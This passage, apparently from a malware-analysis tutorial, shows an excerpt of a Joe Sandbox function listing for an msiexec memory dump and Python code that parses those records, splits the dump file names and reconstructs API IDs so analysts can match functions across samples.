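• Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
APIs
• strlen.MSVCRT ref: 0040849A
• memset.MSVCRT ref: 004084D2
• memcpy.MSVCRT(?,00000000,?,?,?,?,679D7B60,?,00000000), ref: 0040858F
• LocalFree.KERNEL32(00000000,?,?,?,?,679D7B60,?,00000000), ref: 004085BA
Memory Dump Source
• Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
"""


def parse_records(text: str) -> List[Dict]:
    """One dict per function record: 'apis' (list of references) plus the bullet
    key/value pairs; 'Source File' is split into the dump name, Offset and based on PE."""
    records, cur, section = [], {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            # A record starts at "APIs", or at "Memory Dump Source" once the previous
            # record is complete (a listing may begin mid-record, as this sample does).
            finished = "Instruction Fuzzy Hash" in cur
            if line == "APIs" or (line == "Memory Dump Source" and finished):
                if cur:
                    records.append(cur)
                cur = {"apis": []}
            elif not cur:
                cur = {"apis": []}
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unrecognised API line: {line}")
            args = m.group("args")
            cur["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                "args": args.split(",") if args is not None else [],
                                "ref": int(m.group("ref"), 16)})
            continue
        m = KV_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised line: {line}")
        key, value = m.group("key"), m.group("value")
        if key == "Source File":            # "<dump>.sdmp, Offset: X, based on PE: Y"
            name, *rest = [p.strip() for p in value.split(",")]
            cur[key] = name
            for item in rest:
                k, v = item.split(":", 1)
                cur[k.strip()] = v.strip()
        else:
            cur[key] = value
    if cur:
        records.append(cur)
    return records


def dump_fields(record: Dict) -> Dict:
    """Split the dotted .sdmp name.  ASSUMED: field 0 is the PID (it matches the
    "11" in the snapshot name) and field 3 the load base (it matches Offset)."""
    fields = record["Source File"].rsplit(".sdmp", 1)[0].split(".")
    return {"pid": int(fields[0], 16), "base": int(fields[3], 16), "raw": fields}


def reconstruct_api_id(record: Dict) -> str:
    """INFERRED from this page only: the 'API ID' looks like the unique CamelCase
    words of the referenced API names, ASCII-sorted (upper before lower) and joined."""
    words = set()
    for api in record["apis"]:
        words.update(re.findall(r"[A-Z][a-z]*|[a-z]+", api["name"]))
    return "".join(sorted(words))
```

The parser tolerates a listing that begins part-way through a record (as the excerpt on this page does) and an empty "String ID". Once records are structured, a practitioner can filter on the dump base to keep only functions from the injected image, or index the opcode and instruction fuzzy hashes to match functions across samples; those steps are left to the reader.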